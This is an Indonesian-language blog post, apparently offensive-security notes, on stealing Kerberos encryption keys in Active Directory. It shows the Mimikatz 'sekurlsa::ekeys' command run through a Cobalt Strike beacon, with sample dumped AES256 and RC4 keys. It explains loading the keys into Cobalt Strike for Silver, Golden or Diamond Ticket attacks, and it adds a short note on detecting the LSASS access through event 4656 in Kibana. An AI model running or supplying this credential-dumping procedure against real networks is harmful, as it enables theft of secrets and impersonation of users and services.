Post

[Credential Theft] Kerberos Encryption Keys

Kerberos adalah protokol otentikasi jaringan yang digunakan dalam sistem seperti Active Directory.

Kunci enkripsi Kerberos digunakan dalam proses otentikasi dan jika dicuri, penyerang dapat meng-impersonate pengguna atau service dalam jaringan tersebut.

Sebagian besar service Windows modern lebih memilih menggunakan Kerberos daripada NTLM. Ini membuat alih-alih menggunakan hash NTLM, penyerang bisa menggunakan kunci Kerberos sebagai strategi yang lebih efektif untuk menyamarkan serangan sebagai traffic otentikasi normal.

Kunci enkripsi Kerberos ini dapat digunakan dalam berbagai skenario penyalahgunaan Kerberos, seperti Silver Ticket, Golden Ticket, dan Diamond Ticket.

0x1 - Exploitation Stages

Perintah ini memerlukan hak akses yang lebih tinggi.

Modul Mimikatz sekurlsa::ekeys akan men-dump kunci enkripsi Kerberos dari pengguna yang sedang login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
beacon> mimikatz !sekurlsa::ekeys

Authentication Id : 0 ; 459935 (00000000:0007049f)
Session           : Batch from 0
User Name         : namina
Domain            : DEV
Logon Server      : DC-2
Logon Time        : 9/1/2023 8:32:19 AM
SID               : S-1-5-21-569305411-121244042-2357301523-1105

	 * Username : namina
	 * Domain   : DEV.EXAMPLE.IO
	 * Password : (null)
	 * Key List :
	   aes256_hmac       4a8a74daad837ae09e9ecc8c2f1b89f960188cb934db6d4bbebade8318ae57c6
	   rc4_hmac_nt       59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_old      59fc0f884922b4ce376051134c71e22c
	   rc4_md4           59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_nt_exp   59fc0f884922b4ce376051134c71e22c
	   rc4_hmac_old_exp  59fc0f884922b4ce376051134c71e22c

Ada masalah yang diketahui di mana Mimikatz mungkin salah melabeli semua hash sebagai des_cbc_md4.

Dalam kasus ini, kunci AES256 adalah yang kita inginkan.

Hash ini tidak secara otomatis ditambahkan pada Cobalt Strike, tetapi bisa ditambahkan secara manual melalui View > Credentials > Add.

OPSEC

Modul Mimikatz ini akan membuka read handle LSASS yang dapat dicatat dalam event log 4656.

Kita bisa menggunakan kata kunci “Suspicious Handle to LSASS” pada Kibana untuk melihat log ini.


0x2 - References

  • https://adsecurity.org/?page_id=1821
  • https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz
  • https://adsecurity.org/?p=556
This post is licensed under CC BY 4.0 by the author.